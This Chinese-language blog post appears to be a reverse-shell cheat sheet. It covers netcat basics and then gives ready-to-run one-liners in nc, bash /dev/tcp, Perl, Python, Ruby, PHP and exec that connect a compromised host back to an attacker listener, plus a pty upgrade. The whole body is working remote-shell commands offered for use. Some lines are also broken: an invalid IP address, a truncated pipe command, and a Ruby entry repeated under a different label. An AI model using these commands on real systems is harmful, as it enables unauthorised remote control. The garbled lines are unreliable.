各种环境下反弹shell

0x00 NC命令详解

在介绍如何反弹shell之前，先了解相关知识要点。

nc全称为netcat，所做的就是在两台电脑之间建立链接，并返回两个数据流

可运行在TCP或者UDP模式，添加参数 —u 则调整为udP，默认为tcp，详细参数如下

• -g<网关> 设置路由器跃程通信网关，最多可设置8个。
• -G<指向器数目> 设置来源路由指向器，其数值为4的倍数。
• -h 在线帮助。
• -i<延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口。
• -l 使用监听模式，管控传入的资料。
• -n 直接使用IP地址，而不通过域名服务器。
• -o<输出文件> 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。
• -p<通信端口> 设置本地主机使用的通信端口。
• -r 乱数指定本地与远端主机的通信端口。
• -s<来源地址> 设置本地主机送出数据包的IP地址。
• -u 使用UDP传输协议。
• -v 显示指令执行过程。
• -w<超时秒数> 设置等待连线的时间。
• -z 使用0输入/输出模式，只在扫描通信端口时使用。

$ nc -v 172.31.100.7 21

netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。

1、使用nc聊天

$nc -l 1567

netcat 命令在1567端口启动了一个tcp 服务器，所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。

$nc 172.31.100.7 1567

不管你在机器B上键入什么都会出现在机器A上。

实测好像并不可以…

2、nc进行文件传输

Server:

$nc -l 1567 < file.txt ``` Client: ``` $nc -n 172.31.100.7 1567 > file.txt

好像也不行…

不管这些还是直接来反弹shell吧

0x01 NC

1、正向反弹shell

服务器端

nc -lvvp 7777 -e /bin/bash

本地

nc 192.168.242.129 7777

即可获得服务器端的shell

2、反向反弹shell

服务端

nc -e /bin/bash 192.168.242.1 7777

本地

nc -lvvp 7777

不使用-e参数反弹

使用管道

服务端

mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe

攻击端

nc -lnvp 7777

mknod需要root用户，但是也可以通过mkfifo /tmp/backpipe也可以创建一个管道。

0x02 Bash

服务端：

bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1'
或者
bash -i >& /dev/tcp/192.168.242.1/7777 0>&1

攻击端

nc -lvvp 7777

0x03 Perl

第一种方式（linux）

perl -e 'use Socket;$i="192.168.242.1";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ​

本地：nc -nvlp 7777

第二种方式（linux）

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.242.1:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ​

第三种方式（windwos）

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

0x04 Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.27.32.227",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

本地：nc -nvlp 7777

0x05 ruby

第一种方式

ruby -rsocket -e'f=TCPSocket.open("10.10.10.166",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

一次性连接，连上就断，换上 msd 监听也是这样

第二种（linux）

ruby -rsocket -e'f=TCPSocket.open("10.10.10.166",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

一次性连接，连上就断，换上 msf 监听也是这样

第三种方式（windwos）

ruby -rsocket -e 'c=TCPSocket.new("10.10.10.166","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

0x06 PHP

php -r '$sock=fsockopen("10.10.10.166",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
本地  nc -nvlp 4444

0x07 exec

第一种方式

exec 5<>/dev/tcp/10.10.10.166/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
本地：nc -nvlp 4444

第二种方式：

0<&196;exec 196<>/dev/tcp/10.10.10.166/4444; sh <&196>&196 2>&196
本地 nc -nvlp 4444

0x08 原生的 shell 切换交互式 bash

root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39840
$ $ $
$ python -c 'import pty; pty.spawn("/bin/bash")'
kevin@ubuntu:~$ 

0x09 最后

个人觉得这几种应该就够用了，至于其他环境，再看具体情况吧，有一些环境服务器不一定有的

---

参考链接：

https://www.cnblogs.com/deen-/p/7237327.html

https://blog.csdn.net/Kevinhanser/article/details/88920278